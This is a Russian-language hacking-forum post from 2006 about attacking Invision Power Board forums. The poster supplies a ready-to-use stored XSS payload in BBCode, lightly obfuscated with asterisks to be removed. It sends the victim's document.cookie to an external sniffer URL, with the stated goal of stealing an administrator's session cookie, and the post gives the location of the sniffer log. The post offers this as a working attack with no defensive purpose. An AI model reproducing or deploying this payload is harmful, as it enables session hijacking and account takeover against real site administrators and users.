HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.06.2006, 13:50
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами: 11217926

Репутация: 726
По умолчанию

Посмотрел я форум...
Сплоит (по крайней мере у меня) не работает...
Зато есть XSS (Может админ проснется и заглотит его) Просто запости его как сообщение
Код:
[e*mail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
(Нужно убрать все *)
Где http://antichat.ru/cgi-bin/s.jpg? Это ссылка на сниффер
на данный момент куки должны прилететь сюда
http://www.antichat.ru/sniff/log.php
Советую создать свой собственный сниффер так как он более удобный чем паблик.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final 0verfe1 Уязвимости CMS / форумов 7 07.01.2006 03:23
Обход регистрации в Invision Power Board v1.3 Final DeeIP Уязвимости CMS / форумов 1 10.04.2005 20:35
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р) FRTD Уязвимости CMS / форумов 50 02.04.2005 02:48
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Уязвимости CMS / форумов 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Уязвимости CMS / форумов 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.